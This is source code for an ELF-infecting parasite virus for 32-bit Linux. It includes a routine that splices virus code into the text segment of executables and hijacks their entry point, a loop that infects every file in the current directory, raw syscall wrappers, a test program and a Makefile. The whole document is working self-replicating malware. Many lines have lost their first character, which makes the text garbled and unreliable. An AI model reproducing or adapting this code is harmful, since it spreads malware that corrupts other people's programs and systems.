#define PARACODE_LENGTH 1248
#endif
#ifndef NDEBUG
#define V_DEBUG_WRITE(...) \
do {\
g_write(__VA_ARGS__);\
} while(0)
#else
#define V_DEBUG_WRITE(...)
#endif
tatic inline int infect_virus(
const char *file,
void *v_code,
unsigned int v_code_size,
unsigned long v_retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
Elf32_Ehdr *ehdr = NULL;
Elf32_Phdr *phdr;
Elf32_Shdr *shdr;
int i;
int txt_index;
truct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_v_code[PAGE_SIZE];
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};
#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif
fd = g_open(file, O_RDWR, 0);
if (fd == -1) {
goto err;
}
if (g_fstat(fd, &stat) == -1) {
goto err;
}
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}
align_code_size = PAGE_ALIGN(v_code_size);
/* Get program header and section header start address */
hdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
hdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* Locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;
if (phdr[txt_index].p_type == PT_LOAD
amp;& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
gt; phdr[txt_index+1].p_vaddr) {
V_DEBUG_WRITE(1, &luck, sizeof(luck));
goto err;
}
reak;
}
txt_index++;
}
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
ew_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* Increase the p_filesz and p_memsz of text segment
* for new code */
hdr[txt_index].p_filesz += align_code_size;
hdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
hdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
hdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
hdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}
/* Increase p_shoff in the ELF header */
ehdr->e_shoff += align_code_size;
/* Make a new file */
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}
ize = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;
__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}
g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);
if (g_rename(tmpfile, file) == -1) {
goto err;
}
return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}
tatic inline void virus_code(void)
{
char dirdata[4096];
truct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
char curdir[2] = {'.', 0};
char newline = '\n';
curdir[0] = '.';
curdir[1] = 0;
ewline = '\n';
if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;
/* Get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
ara_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
/* Infecting */
while ((nbyte = g_getdents(curfd, (struct dirent *)
amp;dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
amp;(((struct dirent *) 0)->d_name));
V_DEBUG_WRITE(1, &newline, sizeof(newline));
infect_virus(dirp->d_name,
(void *) para_code_start_addr,
PARACODE_LENGTH,
PARACODE_RETADDR_ADDR_OFFSET);
c += dirp->d_reclen;
if (c >= nbyte)
reak;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
}
void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------
------------------------------ gunistd.h ------------------------------
#ifndef _G2_UNISTD_
#define _G2_UNISTD_
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}
#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}
#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
g__syscall_return(type,__res); \
}
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
g__syscall_return(type,__res); \
}
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}
#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------
------------------------------ gsyscall.h ------------------------------
#ifndef _G2_SYSCALL_
#define _G2_SYSCALL_
#include <sys/types.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <linux/fcntl.h>
#include "gunistd.h"
#define NULL 0
truct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
truct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
tatic inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
tatic inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
tatic inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
tatic inline g_syscall1(int, close, int, fd);
tatic inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
tatic inline g_syscall2(int, munmap, void *, addr, size_t, len);
tatic inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
tatic inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);
tatic inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&D" (d1), "=&S" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
#endif /* _G2_SYSCALL_ */
------------------------------ gsyscall.h ------------------------------
------------------------------ foo.c ------------------------------
#include <stdio.h>
int main()
{
uts("real elf point");
return 0;
}
------------------------------ foo.c ------------------------------
------------------------------ Makefile ------------------------------
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
------------------------------ Makefile ------------------------------